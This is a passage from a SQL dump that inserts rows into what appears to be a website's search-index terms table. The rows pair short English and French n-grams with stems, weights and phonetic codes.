qu','me semble qu',0,1,1.4,'M25142',1,'en'),(47844,'meaning of','mean of',0,1,1.3333,'M210',1,'en'),(47845,'meaning of true','mean of true',0,1,1.5,'M2136',1,'en'),(47846,'mettre','mettr',0,0,0.4,'M360',1,'en'),(47847,'mettre un','mettr un',0,1,1.3,'M365',1,'en'),(47848,'mettre un peu','mettr un peu',0,1,1.4333,'M3651',1,'en'),(47849,'might seem','might seem',0,1,1.3333,'M2325',1,'en'),(47850,'might seem a','might seem a',0,1,1.4,'M2325',1,'en'),(47851,'military','militari',0,0,0.5333,'M436',1,'en'),(47852,'military demonstrations','militari demonstrations',0,1,1.7667,'M43635236352',1,'en'),(47853,'military demonstrations take','militari demonstrations take',0,1,1.9333,'M4363523635232',1,'en'),(47854,'miller has','miller has',0,1,1.3333,'M462',1,'en'),(47855,'miller has a','miller has a',0,1,1.4,'M462',1,'en'),(47856,'million years','million years',0,1,1.4333,'M4562',1,'en'),(47857,'million years away','million years away',0,1,1.6,'M4562',1,'en'),(47858,'model to','model to',0,1,1.2667,'M343',1,'en'),(47859,'model to our','model to our',0,1,1.4,'M3436',1,'en'),(47860,'modest','modest',0,0,0.4,'M323',1,'en'),(47861,'modest maternity','modest maternity',0,1,1.5333,'M32353653',1,'en'),(47862,'modest on','modest on',0,1,1.3,'M3235',1,'en'),(47863,'modest on top','modest on top',0,1,1.4333,'M323531',1,'en'),(47864,'moment','moment',0,0,0.4,'M300',1,'en'),(47865,'moment is','moment is',0,1,1.3,'M320',1,'en'),(47866,'moment is set','moment is set',0,1,1.4333,'M323',1,'en'),(47867,'more formal','more formal',0,1,1.3667,'M61654',1,'en'),(47868,'more formal knee','more formal knee',0,1,1.5333,'M6165425',1,'en'),(47869,'morning trolley','morn trolley',0,1,1.5,'M652364',1,'en'),(47870,'morning trolley service','morn trolley service',0,1,1.7667,'M6523642612',1,'en'),(47871,'navy blue','navi blue',0,1,1.3,'N140',1,'en'),(47872,'navy blue military','navi blue military',0,1,1.6,'N145436',1,'en'),(47873,'need to find','need to find',0,1,1.4,'N3153',1,'en'),(47874,'niche','nich',0,0,0.3333,'N200',1,'en'),(47875,'niche market','nich market',0,1,1.4,'N25623',1,'en'),(47876,'niche market then','nich market then',0,1,1.5667,'N256235',1,'en'),(47877,'no coffee','no coffee',0,1,1.3,'N210',1,'en'),(47878,'no coffee as','no coffee as',0,1,1.4,'N212',1,'en'),(47879,'no other single','no other single',0,1,1.5,'N362524',1,'en'),(47880,'nobody at','nobodi at',0,1,1.3,'N130',1,'en'),(47881,'nobody at the','nobodi at the',0,1,1.4333,'N130',1,'en'),(47882,'non i','non i',0,1,1.1667,'N000',1,'en'),(47883,'non i am','non i am',0,1,1.2667,'N000',1,'en'),(47884,'now i\'ll','now i',0,1,1.2667,'N400',1,'en'),(47885,'now i\'ll be','now i be',0,1,1.3667,'N410',1,'en'),(47886,'numerous','numer',0,0,0.5333,'N620',1,'en'),(47887,'numerous friendships','numer friendships',0,1,1.6667,'N621653212',1,'en'),(47888,'numerous friendships and','numer friendships and',0,1,1.8,'N62165321253',1,'en'),(47889,'of a higher','of a higher',0,1,1.3667,'O126',1,'en'),(47890,'of a niche','of a niche',0,1,1.3333,'O152',1,'en'),(47891,'of a time','of a time',0,1,1.3,'O135',1,'en'),(47892,'of accomplishment','of accomplishment',0,1,1.5667,'O12514253',1,'en'),(47893,'of accomplishment and','of accomplishment and',0,1,1.7,'O1251425353',1,'en'),(47894,'of beautiful','of beautiful',0,1,1.4,'O1314',1,'en'),(47895,'of beautiful prom','of beautiful prom',0,1,1.5667,'O1314165',1,'en'),(47896,'of fame','of fame',0,1,1.2333,'O150',1,'en'),(47897,'of fame queen','of fame queen',0,1,1.4333,'O1525',1,'en'),(47898,'of promising','of promising',0,1,1.4,'O165252',1,'en'),(47899,'of promising season','of promising season',0,1,1.6333,'O1652525',1,'en'),(47900,'of that yikes','of that yikes',0,1,1.4333,'O132',1,'en'),(47901,'of the word','of the word',0,1,1.3667,'O1363',1,'en'),(47902,'of the year','of the year',0,1,1.3667,'O136',1,'en'),(47903,'of true','of true',0,1,1.2333,'O136',1,'en'),(47904,'of true service','of true service',0,1,1.5,'O1362612',1,'en'),(47905,'ogling','ogl',0,0,0.4,'O2452',1,'en'),(47906,'ogling the','ogl the',0,1,1.3333,'O24523',1,'en'),(47907,'ogling the selection','ogl the selection',0,1,1.6667,'O2452324235',1,'en'),(47908,'on manque','on manque',0,1,1.3,'O520',1,'en'),(47909,'on manque felipe','on manque felipe',0,1,1.5333,'O52141',1,'en'),(47910,'on the top','on the top',0,1,1.3333,'O531',1,'en'),(47911,'on top','on top',0,1,1.2,'O531',1,'en'),(47912,'on top of','on top of',0,1,1.3,'O531',1,'en'),(47913,'once rationing','onc rationing',0,1,1.4667,'O526352',1,'en'),(47914,'once rationing kicked','onc rationing kicked',0,1,1.7,'O5263523',1,'en'),(47915,'only candidate','onli candidate',0,1,1.4667,'O54253',1,'en'),(47916,'only candidate in','onli candidate in',0,1,1.5667,'O542535',1,'en'),(47917,'only those','onli those',0,1,1.3333,'O5432',1,'en'),(47918,'only those of','onli those of',0,1,1.4333,'O54321',1,'en'),(47919,'opened','open',0,0,0.4,'O153',1,'en'),(47920,'opened the','open the',0,1,1.3333,'O153',1,'en'),(47921,'opened the door','open the door',0,1,1.5,'O1536',1,'en'),(47922,'opportunities','opportun',0,0,0.8667,'O163532',1,'en'),(47923,'opportunities while','opportun while',0,1,1.6333,'O1635324',1,'en'),(47924,'opportunities while serving','opportun while serving',0,1,1.9,'O163532426152',1,'en'),(47925,'or even','or even',0,1,1.2333,'O615',2,'en'),(47926,'or even thinking','or even thinking',0,1,1.5333,'O61535252',1,'en'),(47927,'other single','other single',0,1,1.4,'O362524',1,'en'),(47928,'other single event','other single event',0,1,1.6,'O362524153',1,'en'),(47929,'our young women','our young women',0,1,1.5,'O6525',1,'en'),(47930,'over to the','over to the',0,1,1.3667,'O163',1,'en'),(47931,'pas','pa',0,0,0.2,'P200',1,'en'),(47932,'pas l','pa l',0,1,1.1667,'P240',1,'en'),(47933,'pas l du','pa l du',0,1,1.2667,'P243',1,'en'),(47934,'pas vraiment','pa vraiment',0,1,1.4,'P21653',1,'en'),(47935,'pas vraiment compris','pa vraiment compris',0,1,1.6667,'P2165325162',1,'en'),(47936,'people are','peopl are',0,1,1.3333,'P460',1,'en'),(47937,'people are wonderful','peopl are wonderful',0,1,1.6667,'P4653614',1,'en'),(47938,'people i','peopl i',0,1,1.2667,'P400',1,'en'),(47939,'people i feel','peopl i feel',0,1,1.4333,'P414',1,'en'),(47940,'peu','peu',0,0,0.2,'P000',1,'en'),(47941,'peu d','peu d',0,1,1.1667,'P300',1,'en'),(47942,'peu d ldedans','peu d ldedans',0,1,1.4333,'P34352',1,'en'),(47943,'place in the','place in the',0,1,1.4,'P4253',1,'en'),(47944,'plain','plain',0,0,0.3333,'P450',1,'en'),(47945,'plain biscuits','plain biscuits',0,1,1.4667,'P451232',1,'en'),(47946,'plain biscuits there','plain biscuits there',0,1,1.6667,'P45123236',1,'en'),(47947,'platform to','platform to',0,1,1.3667,'P431653',1,'en'),(47948,'platform to act','platform to act',0,1,1.5,'P43165323',1,'en'),(47949,'point for','point for',0,1,1.3,'P5316',1,'en'),(47950,'point for numerous','point for numerous',0,1,1.6,'P5316562',1,'en'),(47951,'politician','politician',0,0,0.6667,'P4325',1,'en'),(47952,'politician there','politician there',0,1,1.5333,'P432536',1,'en'),(47953,'politician there was','politician there was',0,1,1.6667,'P4325362',1,'en'),(47954,'pregnancy','pregnanc',0,0,0.6,'P6252',1,'en'),(47955,'pregnancy now','pregnanc now',0,1,1.4333,'P62525',1,'en'),(47956,'pregnancy now i\'ll','pregnanc now i',0,1,1.6,'P625254',1,'en'),(47957,'pregnant','pregnant',0,0,0.5333,'P6253',1,'en'),(47958,'pregnant or','pregnant or',0,1,1.3667,'P62536',1,'en'),(47959,'pregnant or even','pregnant or even',0,1,1.5333,'P6253615',1,'en'),(47960,'pregnant when','pregnant when',0,1,1.4333,'P62535',1,'en'),(47961,'pregnant when her','pregnant when her',0,1,1.5667,'P625356',1,'en'),(47962,'prnewswire','prnewswir',0,0,0.6667,'P6526',1,'en'),(47963,'prnewswire it\'s','prnewswir it',0,1,1.5,'P652632',1,'en'),(47964,'prnewswire it\'s the','prnewswir it the',0,1,1.6333,'P6526323',1,'en'),(47965,'prom 2013','prom 2013',0,1,1.3,'P650',1,'en'),(47966,'prom 2013 and','prom 2013 and',0,1,1.4333,'P653',1,'en'),(47967,'prom dresses for','prom dresses for',0,1,1.5333,'P6536216',1,'en'),(47968,'promising','promis',0,0,0.6,'P65252',1,'en'),(47969,'promising season','promis season',0,1,1.5333,'P652525',1,'en'),(47970,'promising season would','promis season would',0,1,1.7333,'P65252543',1,'en'),(47971,'providing a','provid a',0,1,1.3667,'P61352',1,'en'),(47972,'providing a platform','provid a platform',0,1,1.6667,'P61352143165',1,'en'),(47973,'pu','pu',0,0,0.1333,'P000',1,'en'),(47974,'pu faire','pu faire',0,1,1.2667,'P600',1,'en'),(47975,'pu faire jouer','pu faire jouer',0,1,1.4667,'P626',1,'en'),(47976,'qu','qu',0,0,0.1333,'Q000',1,'en'),(47977,'qu aurait','qu aurait',0,1,1.3,'Q630',1,'en'),(47978,'qu aurait pu','qu aurait pu',0,1,1.4,'Q631',1,'en'),(47979,'queen','queen',0,0,0.3333,'Q500',1,'en'),(47980,'queen was','queen was',0,1,1.3,'Q520',1,'en'),(47981,'queen was an','queen was an',0,1,1.4,'Q525',1,'en'),(47982,'race that','race that',0,1,1.3,'R230',1,'en'),(47983,'race that comes','race that comes',0,1,1.5,'R23252',1,'en'),(47984,'rationing','ration',0,0,0.6,'R352',1,'en'),(47985,'rationing kicked','ration kicked',0,1,1.5333,'R3523',1,'en'),(47986,'rationing kicked in','ration kicked in',0,1,1.6333,'R35235',1,'en'),(47987,'real record','real record',0,1,1.3667,'R46263',1,'en'),(47988,'real record of','real record of',0,1,1.4667,'R462631',1,'en'),(47989,'record of','record of',0,1,1.3,'R2631',1,'en'),(47990,'record of accomplishment','record of accomplishment',0,1,1.8,'R26312514253',1,'en'),(47991,'research materials','research materials',0,1,1.6,'R26253642',1,'en'),(47992,'research materials will','research materials will',0,1,1.7667,'R262536424',1,'en'),(47993,'reste','rest',0,0,0.3333,'R230',1,'en'),(47994,'reste mettre','rest mettre',0,1,1.4,'R23536',1,'en'),(47995,'reste mettre un','rest mettre un',0,1,1.5,'R235365',1,'en'),(47996,'rle','rle',0,0,0.2,'R400',1,'en'),(47997,'rle de','rle de',0,1,1.2,'R430',1,'en'),(47998,'rle de warner','rle de warner',0,1,1.4333,'R43656',1,'en'),(47999,'role model','role model',0,1,1.3333,'R4534',1,'en'),(48000,'role model to','role model to',0,1,1.4333,'R45343',1,'en'),(48001,'said i\'m','said i',0,1,1.2667,'S350',1,'en'),(48002,'said i\'m voting','said i voting',0,1,1.5,'S351352',1,'en'),(48003,'said skowhegan','said skowhegan',0,1,1.4667,'S325',1,'en'),(48004,'said skowhegan people','said skowhegan people',0,1,1.7,'S32514',1,'en'),(48005,'said yes','said yes',0,1,1.2667,'S320',1,'en'),(48006,'said yes i','said yes i',0,1,1.3333,'S320',1,'en'),(48007,'season would','season would',0,1,1.4,'S543',1,'en'),(48008,'season would you','season would you',0,1,1.5333,'S543',1,'en'),(48009,'seem a','seem a',0,1,1.2,'S500',1,'en'),(48010,'seem a million','seem a million',0,1,1.4667,'S545',1,'en'),(48011,'selection of','select of',0,1,1.4,'S42351',1,'en'),(48012,'selection of beautiful','select of beautiful',0,1,1.7333,'S42351314',1,'en'),(48013,'semble','sembl',0,0,0.4,'S514',1,'en'),(48014,'semble qu','sembl qu',0,1,1.3,'S5142',1,'en'),(48015,'semble qu aurait','sembl qu aurait',0,1,1.5333,'S514263',1,'en'),(48016,'sense of the','sens of the',0,1,1.4,'S5213',1,'en'),(48017,'service and','servic and',0,1,1.3667,'S61253',1,'en'),(48018,'service and the','servic and the',0,1,1.5,'S61253',1,'en'),(48019,'service lemerand','servic lemerand',0,1,1.5333,'S61245653',1,'en'),(48020,'service lemerand said','servic lemerand said',0,1,1.7,'S6124565323',1,'en'),(48021,'service with','servic with',0,1,1.4,'S6123',1,'en'),(48022,'service with fresh','servic with fresh',0,1,1.6,'S6123162',1,'en'),(48023,'serving','serv',0,0,0.4667,'S6152',1,'en'),(48024,'serving as','serv as',0,1,1.3333,'S6152',1,'en'),(48025,'serving as the','serv as the',0,1,1.4667,'S61523',1,'en'),(48026,'set up','set up',0,1,1.2,'S310',1,'en'),(48027,'set up like','set up like',0,1,1.3667,'S3142',1,'en'),(48028,'single event','singl event',0,1,1.4,'S524153',1,'en'),(48029,'single event has','singl event has',0,1,1.5333,'S5241532',1,'en'),(48030,'site to','site to',0,1,1.2333,'S300',1,'en'),(48031,'site to start','site to start',0,1,1.4333,'S32363',1,'en'),(48032,'skowhegan','skowhegan',0,0,0.6,'S500',1,'en'),(48033,'skowhegan people','skowhegan people',0,1,1.5333,'S514',1,'en'),(48034,'skowhegan people are','skowhegan people are',0,1,1.6667,'S5146',1,'en'),(48035,'snowmobile','snowmobil',0,0,0.6667,'S514',1,'en'),(48036,'snowmobile trails','snowmobil trails',0,1,1.5667,'S5143642',1,'en'),(48037,'snowmobile trails groomed','snowmobil trails groomed',0,1,1.8333,'S5143642653',1,'en'),(48038,'so many opportunities','so many opportunities',0,1,1.7,'S5163532',1,'en'),(48039,'somebody\'s','somebodi',0,0,0.6667,'S5132',1,'en'),(48040,'somebody\'s going','somebodi going',0,1,1.5333,'S513252',1,'en'),(48041,'somebody\'s going to','somebodi going to',0,1,1.6333,'S5132523',1,'en'),(48042,'sparse','spars',0,0,0.4,'S162',1,'en'),(48043,'sparse affair','spars affair',0,1,1.4333,'S16216',1,'en'),(48044,'sparse affair mainly','spars affair mainly',0,1,1.6667,'S1621654',1,'en'),(48045,'spring and','spring and',0,1,1.3333,'S165253',1,'en'),(48046,'spring and early','spring and early',0,1,1.5333,'S16525364',1,'en'),(48047,'start of','start of',0,1,1.2667,'S3631',1,'en'),(48048,'start of promising','start of promising',0,1,1.6,'S363165252',1,'en'),(48049,'start ogling','start ogling',0,1,1.4,'S3632452',1,'en'),(48050,'start ogling the','start ogling the',0,1,1.5333,'S36324523',1,'en'),(48051,'starting','start',0,0,0.5333,'S36352',1,'en'),(48052,'starting point','start point',0,1,1.4667,'S36352153',1,'en'),(48053,'starting point for','start point for',0,1,1.6,'S3635215316',1,'en'),(48054,'straight over','straight over',0,1,1.4333,'S362316',1,'en'),(48055,'straight over to','straight over to',0,1,1.5333,'S3623163',1,'en'),(48056,'summer might','summer might',0,1,1.4,'S56523',1,'en'),(48057,'summer might seem','summer might seem',0,1,1.5667,'S5652325',1,'en'),(48058,'support','support',0,0,0.4667,'S163',2,'en'),(48059,'support a','support a',0,1,1.3,'S163',1,'en'),(48060,'support a veteran','support a veteran',0,1,1.5667,'S1631365',1,'en'),(48061,'take place','take place',0,1,1.3333,'T2142',1,'en'),(48062,'take place in','take place in',0,1,1.4333,'T21425',1,'en'),(48063,'tea and','tea and',0,1,1.2333,'T530',1,'en'),(48064,'tea and plain','tea and plain',0,1,1.4333,'T53145',1,'en'),(48065,'tea urns','tea urns',0,1,1.2667,'T652',1,'en'),(48066,'tea urns there','tea urns there',0,1,1.4667,'T65236',1,'en'),(48067,'than you','than you',0,1,1.2667,'T500',1,'en'),(48068,'than you think','than you think',0,1,1.4667,'T5352',1,'en'),(48069,'that comes','that comes',0,1,1.3333,'T252',1,'en'),(48070,'that comes from','that comes from',0,1,1.5,'T252165',1,'en'),(48071,'that somebody\'s','that somebody',0,1,1.5,'T25132',1,'en'),(48072,'that somebody\'s going','that somebody going',0,1,1.7,'T2513252',1,'en'),(48073,'that yikes','that yikes',0,1,1.3333,'T200',1,'en'),(48074,'that yikes it\'s','that yikes it',0,1,1.5,'T232',1,'en'),(48075,'the afternoon','the afternoon',0,1,1.4333,'T1365',1,'en'),(48076,'the afternoon research','the afternoon research',0,1,1.7333,'T13656262',1,'en'),(48077,'the coldest','the coldest',0,1,1.3667,'T24323',1,'en'),(48078,'the coldest time','the coldest time',0,1,1.5333,'T243235',1,'en'),(48079,'the corner','the corner',0,1,1.3333,'T2656',1,'en'),(48080,'the corner of','the corner of',0,1,1.4333,'T26561',1,'en'),(48081,'the customers','the customers',0,1,1.4333,'T23562',2,'en'),(48082,'the customers and','the customers and',0,1,1.5667,'T2356253',1,'en'),(48083,'the door to','the door to',0,1,1.3667,'T630',1,'en'),(48084,'the help','the help',0,1,1.2667,'T410',2,'en'),(48085,'the help i','the help i',0,1,1.3333,'T410',1,'en'),(48086,'the jovani','the jovani',0,1,1.3333,'T215',1,'en'),(48087,'the jovani web','the jovani web',0,1,1.4667,'T2151',1,'en'),(48088,'the meaning','the meaning',0,1,1.3667,'T520',1,'en'),(48089,'the meaning of','the meaning of',0,1,1.4667,'T521',1,'en'),(48090,'the moment','the moment',0,1,1.3333,'T530',1,'en'),(48091,'the moment is','the moment is',0,1,1.4333,'T532',1,'en'),(48092,'the only candidate','the only candidate',0,1,1.6,'T54253',1,'en'),(48093,'the selection','the selection',0,1,1.4333,'T24235',1,'en'),(48094,'the selection of','the selection of',0,1,1.5333,'T242351',1,'en'),(48095,'the starting','the starting',0,1,1.4,'T236352',1,'en'),(48096,'the starting point','the starting point',0,1,1.6,'T236352153',1,'en'),(48097,'the top floor','the top floor',0,1,1.4333,'T146',1,'en'),(48098,'the trolley','the trolley',0,1,1.3667,'T640',1,'en'),(48099,'the trolley was','the trolley was',0,1,1.5,'T642',1,'en'),(48100,'the waitresses','the waitresses',0,1,1.4667,'T620',1,'en'),(48101,'the waitresses wore','the waitresses wore',0,1,1.6333,'T626',1,'en'),(48102,'the word no','the word no',0,1,1.3667,'T635',1,'en'),(48103,'the year','the year',0,1,1.2667,'T600',1,'en'),(48104,'the year and','the year and',0,1,1.4,'T653',1,'en'),(48105,'then add','then add',0,1,1.2667,'T530',1,'en'),(48106,'then add modest','then add modest',0,1,1.5,'T535323',1,'en'),(48107,'there was','there was',0,1,1.3,'T620',1,'en'),(48108,'there was a','there was a',0,1,1.3667,'T620',1,'en'),(48109,'there was no','there was no',0,1,1.4,'T625',1,'en'),(48110,'there\'s going','there going',0,1,1.4333,'T6252',1,'en'),(48111,'there\'s going to','there going to',0,1,1.5333,'T62523',1,'en'),(48112,'think don\'t','think don',0,1,1.3667,'T52353',1,'en'),(48113,'think don\'t wait','think don wait',0,1,1.5333,'T52353',1,'en'),(48114,'thinking about pregnancy','think about pregnancy',0,1,1.8,'T52521316252',1,'en'),(48115,'this race','thi race',0,1,1.3,'T262',1,'en'),(48116,'this race that','thi race that',0,1,1.4667,'T2623',1,'en'),(48117,'those of','those of',0,1,1.2667,'T210',1,'en'),(48118,'those of a','those of a',0,1,1.3333,'T210',1,'en'),(48119,'time of','time of',0,1,1.2333,'T510',1,'en'),(48120,'time of the','time of the',0,1,1.3667,'T513',1,'en'),(48121,'time trying','time trying',0,1,1.3667,'T53652',1,'en'),(48122,'time trying to','time trying to',0,1,1.4667,'T536523',1,'en'),(48123,'to act','to act',0,1,1.2,'T230',1,'en'),(48124,'to act as','to act as',0,1,1.3,'T232',1,'en'),(48125,'to do it','to do it',0,1,1.2667,'T000',1,'en'),(48126,'to fill','to fill',0,1,1.2333,'T140',1,'en'),(48127,'to fill and','to fill and',0,1,1.3667,'T1453',1,'en'),(48128,'to find a','to find a',0,1,1.3,'T153',1,'en'),(48129,'to have to','to have to',0,1,1.3333,'T130',1,'en'),(48130,'to head','to head',0,1,1.2333,'T000',1,'en'),(48131,'to head straight','to head straight',0,1,1.5333,'T23623',1,'en'),(48132,'to look up','to look up',0,1,1.3333,'T421',1,'en'),(48133,'to our young','to our young',0,1,1.4,'T652',1,'en'),(48134,'to so','to so',0,1,1.1667,'T200',1,'en'),(48135,'to so many','to so many',0,1,1.3333,'T250',1,'en'),(48136,'to start ogling','to start ogling',0,1,1.5,'T23632452',1,'en'),(48137,'to support','to support',0,1,1.3333,'T2163',1,'en'),(48138,'to support a','to support a',0,1,1.4,'T2163',1,'en'),(48139,'to the jovani','to the jovani',0,1,1.4333,'T215',1,'en'),(48140,'top floor','top floor',0,1,1.3,'T146',1,'en'),(48141,'top floor where','top floor where',0,1,1.5,'T146',1,'en'),(48142,'top of','top of',0,1,1.2,'T100',1,'en'),(48143,'top of that','top of that',0,1,1.3667,'T130',1,'en'),(48144,'tough','tough',0,0,0.3333,'T200',1,'en'),(48145,'tough i','tough i',0,1,1.2333,'T200',1,'en'),(48146,'tough i need','tough i need',0,1,1.4,'T253',1,'en'),(48147,'tout','tout',0,0,0.2667,'T000',1,'en'),(48148,'tout et','tout et',0,1,1.2333,'T000',1,'en'),(48149,'tout et comme','tout et comme',0,1,1.4333,'T250',1,'en'),(48150,'trails','trail',0,0,0.4,'T642',1,'en'),(48151,'trails groomed','trail groomed',0,1,1.4667,'T642653',1,'en'),(48152,'trails groomed at','trail groomed at',0,1,1.5667,'T642653',1,'en'),(48153,'trolley','trollei',0,0,0.4667,'T640',1,'en'),(48154,'trolley service','trollei service',0,1,1.5,'T642612',1,'en'),(48155,'trolley service with','trollei service with',0,1,1.6667,'T6426123',1,'en'),(48156,'trolley was','trollei was',0,1,1.3667,'T642',1,'en'),(48157,'trolley was a','trollei was a',0,1,1.4333,'T642',1,'en'),(48158,'true service','true service',0,1,1.4,'T62612',1,'en'),(48159,'true service lemerand','true service lemerand',0,1,1.7,'T6261245653',1,'en'),(48160,'trying to find','try to find',0,1,1.4667,'T6523153',1,'en'),(48161,'un peu','un peu',0,1,1.2,'U510',1,'en'),(48162,'un peu d','un peu d',0,1,1.2667,'U513',1,'en'),(48163,'understands','understand',0,0,0.7333,'U53623532',1,'en'),(48164,'understands how','understand how',0,1,1.5,'U53623532',1,'en'),(48165,'understands how jobs','understand how jobs',0,1,1.6667,'U5362353212',1,'en'),(48166,'up floyd','up floyd',0,1,1.2667,'U143',1,'en'),(48167,'up floyd county','up floyd county',0,1,1.5,'U143253',1,'en'),(48168,'up like','up like',0,1,1.2333,'U142',1,'en'),(48169,'up like we','up like we',0,1,1.3333,'U142',1,'en'),(48170,'urns','urn',0,0,0.2667,'U652',1,'en'),(48171,'urns there','urn there',0,1,1.3333,'U65236',1,'en'),(48172,'urns there was','urn there was',0,1,1.4667,'U652362',1,'en'),(48173,'usually ate','usual ate',0,1,1.3667,'U243',1,'en'),(48174,'usually ate it','usual ate it',0,1,1.4667,'U243',1,'en'),(48175,'valentin','valentin',0,0,0.5333,'V4535',1,'en'),(48176,'valentin droite','valentin droite',0,1,1.5,'V4535363',1,'en'),(48177,'valentin droite non','valentin droite non',0,1,1.6333,'V45353635',1,'en'),(48178,'very sparse','veri sparse',0,1,1.3667,'V62162',1,'en'),(48179,'very sparse affair','veri sparse affair',0,1,1.6,'V6216216',1,'en'),(48180,'veteran','veteran',0,0,0.4667,'V365',1,'en'),(48181,'veteran who','veteran who',0,1,1.3667,'V365',1,'en'),(48182,'veteran who knows','veteran who knows',0,1,1.5667,'V365252',1,'en'),(48183,'volont','volont',0,0,0.4,'V453',1,'en'),(48184,'volont reste','volont reste',0,1,1.4,'V453623',1,'en'),(48185,'volont reste mettre','volont reste mettre',0,1,1.6333,'V453623536',1,'en'),(48186,'voting','vote',0,0,0.4,'V352',1,'en'),(48187,'voting for','vote for',0,1,1.3333,'V35216',1,'en'),(48188,'voting for craig','vote for craig',0,1,1.5333,'V35216262',1,'en'),(48189,'vraiment','vraiment',0,0,0.5333,'V653',1,'en'),(48190,'vraiment compris','vraiment compris',0,1,1.5333,'V65325162',1,'en'),(48191,'vraiment compris le','vraiment compris le',0,1,1.6333,'V653251624',1,'en'),(48192,'wait to','wait to',0,1,1.2333,'W300',1,'en'),(48193,'wait to head','wait to head',0,1,1.4,'W300',1,'en'),(48194,'waitress','waitress',0,0,0.5333,'W362',1,'en'),(48195,'waitress service','waitress service',0,1,1.5333,'W362612',1,'en'),(48196,'waitress service and','waitress service and',0,1,1.6667,'W36261253',1,'en'),(48197,'waitresses','waitress',0,0,0.6667,'W362',1,'en'),(48198,'waitresses wore','waitress wore',0,1,1.5,'W3626',1,'en'),(48199,'waitresses wore black','waitress wore black',0,1,1.7,'W3626142',1,'en'),(48200,'wallace','wallac',0,0,0.4667,'W420',1,'en'),(48201,'wallace a','wallac a',0,1,1.3,'W420',1,'en'),(48202,'wallace a du','wallac a du',0,1,1.4,'W423',1,'en'),(48203,'war connections','war connections',0,1,1.5,'W6252352',1,'en'),(48204,'war connections and','war connections and',0,1,1.6333,'W625235253',1,'en'),(48205,'warner','warner',0,0,0.4,'W656',1,'en'),(48206,'warner wallace','warner wallace',0,1,1.4667,'W65642',1,'en'),(48207,'warner wallace a','warner wallace a',0,1,1.5333,'W65642',1,'en'),(48208,'was a dining','wa a dining',0,1,1.4,'W2352',1,'en'),(48209,'was a morning','wa a morning',0,1,1.4333,'W25652',1,'en'),(48210,'was a very','wa a very',0,1,1.3333,'W216',1,'en'),(48211,'was an honor','wa an honor',0,1,1.4,'W256',1,'en'),(48212,'was no','wa no',0,1,1.2,'W250',1,'en'),(48213,'was no coffee','wa no coffee',0,1,1.4333,'W2521',1,'en'),(48214,'wasn\'t pregnant','wasn pregnant',0,1,1.5,'W25316253',1,'en'),(48215,'wasn\'t pregnant or','wasn pregnant or',0,1,1.6,'W253162536',1,'en'),(48216,'we were','we were',0,1,1.2333,'W600',1,'en'),(48217,'we were to','we were to',0,1,1.3333,'W630',1,'en'),(48218,'wear is','wear is',0,1,1.2333,'W620',1,'en'),(48219,'wear is already','wear is already',0,1,1.5,'W62463',1,'en'),(48220,'web site to','web site to',0,1,1.3667,'W123',1,'en'),(48221,'weddings are','wed are',0,1,1.4,'W3526',1,'en'),(48222,'weddings are far','wed are far',0,1,1.5333,'W352616',1,'en'),(48223,'well wenger','well wenger',0,1,1.3667,'W4526',1,'en'),(48224,'well wenger pas','well wenger pas',0,1,1.5,'W452612',1,'en'),(48225,'wenger','wenger',0,0,0.4,'W526',1,'en'),(48226,'wenger pas','wenger pas',0,1,1.3333,'W52612',1,'en'),(48227,'wenger pas l','wenger pas l',0,1,1.4,'W526124',1,'en'),(48228,'were to','were to',0,1,1.2333,'W630',1,'en'),(48229,'were to do','were to do',0,1,1.3333,'W630',1,'en'),(48230,'when her','when her',0,1,1.2667,'W560',1,'en'),(48231,'when her big','when her big',0,1,1.4,'W5612',1,'en'),(48232,'when i said','when i said',0,1,1.3667,'W523',1,'en'),(48233,'where only','where only',0,1,1.3333,'W654',1,'en'),(48234,'where only those','where only those',0,1,1.5333,'W65432',1,'en'),(48235,'while serving','while serving',0,1,1.4333,'W426152',1,'en'),(48236,'while serving as','while serving as',0,1,1.5333,'W426152',1,'en'),(48237,'white frilly','white frilly',0,1,1.4,'W3164',1,'en'),(48238,'white frilly aprons','white frilly aprons',0,1,1.6333,'W31641652',1,'en'),(48239,'who knows','who knows',0,1,1.3,'W252',1,'en'),(48240,'who knows the','who knows the',0,1,1.4333,'W2523',1,'en'),(48241,'who\'s','who',0,0,0.3333,'W200',1,'en'),(48242,'who\'s going','who going',0,1,1.3667,'W252',1,'en'),(48243,'who\'s going to','who going to',0,1,1.4667,'W2523',1,'en'),(48244,'why fit','why fit',0,1,1.2333,'W130',1,'en'),(48245,'will be accepted','will be accepted',0,1,1.5333,'W41213',1,'en'),(48246,'will be available','will be available',0,1,1.5667,'W41414',1,'en'),(48247,'wish','wish',0,0,0.2667,'W200',1,'en'),(48248,'wish everyone','wish everyone',0,1,1.4333,'W2165',1,'en'),(48249,'wish everyone balfleet','wish everyone balfleet',0,1,1.7333,'W216514143',1,'en'),(48250,'with fresh','with fresh',0,1,1.3333,'W3162',1,'en'),(48251,'with fresh baked','with fresh baked',0,1,1.5333,'W3162123',1,'en'),(48252,'women there\'s','women there',0,1,1.4333,'W5362',1,'en'),(48253,'women there\'s going','women there going',0,1,1.6333,'W536252',1,'en'),(48254,'wonderful people','wonder people',0,1,1.5333,'W5361414',1,'en'),(48255,'wonderful people i','wonder people i',0,1,1.6,'W5361414',1,'en'),(48256,'word no','word no',0,1,1.2333,'W635',1,'en'),(48257,'word no other','word no other',0,1,1.4333,'W63536',1,'en'),(48258,'wore black','wore black',0,1,1.3333,'W6142',1,'en'),(48259,'wore black dresses','wore black dresses',0,1,1.6,'W6142362',1,'en'),(48260,'would absolutely','would absolutely',0,1,1.5333,'W4312434',1,'en'),(48261,'would absolutely do','would absolutely do',0,1,1.6333,'W43124343',1,'en'),(48262,'would you do','would you do',0,1,1.4,'W430',1,'en'),(48263,'year and late','year and late',0,1,1.4333,'Y65343',1,'en'),(48264,'years away','year away',0,1,1.3333,'Y620',1,'en'),(48265,'years away but','year away but',0,1,1.4667,'Y6213',1,'en'),(48266,'yes','ye',1,0,0.025,'Y200',1,'en'),(48267,'yes i','ye i',0,1,1.1667,'Y200',1,'en'),(48268,'yes i wasn\'t','ye i wasn',0,1,1.4,'Y253',1,'en'),(48269,'yikes','yike',0,0,0.3333,'Y200',1,'en'),(48270,'yikes it\'s','yike it',0,1,1.3333,'Y232',1,'en'),(48271,'yikes it\'s tough','yike it tough',0,1,1.5333,'Y23232',1,'en'),(48272,'you do it','you do it',0,1,1.3,'Y300',1,'en'),(48273,'you think don\'t','you think don',0,1,1.5,'Y352353',1,'en'),(48274,'young women','young women',0,1,1.3667,'Y525',1,'en'),(48275,'young women there\'s','young women there',0,1,1.6333,'Y525362',1,'en'),(48276,'000 was','000 was',0,1,1.2333,'W200',1,'en'),(48277,'000 was met','000 was 